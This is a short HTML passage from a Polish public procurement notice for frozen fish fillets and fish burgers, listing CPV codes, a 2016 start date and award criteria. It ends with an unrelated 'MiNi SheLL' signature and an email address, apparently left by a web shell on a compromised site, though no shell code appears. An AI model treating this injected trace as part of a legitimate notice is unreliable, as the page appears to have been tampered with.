<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Ryba filet - część ryby w postaci płatu mięsa, nie zawierający ości, skór, płetw i głowy, mrożona z max ilością glazury do 10% CPV 15211000-0;
2) Burgery rybne - mrożony kotlet rybny w gotowej panierce, w kształcie prostokąta lub owalne o wymiarach nie przekraczających 10 cm CPV 15240000-2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.21.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com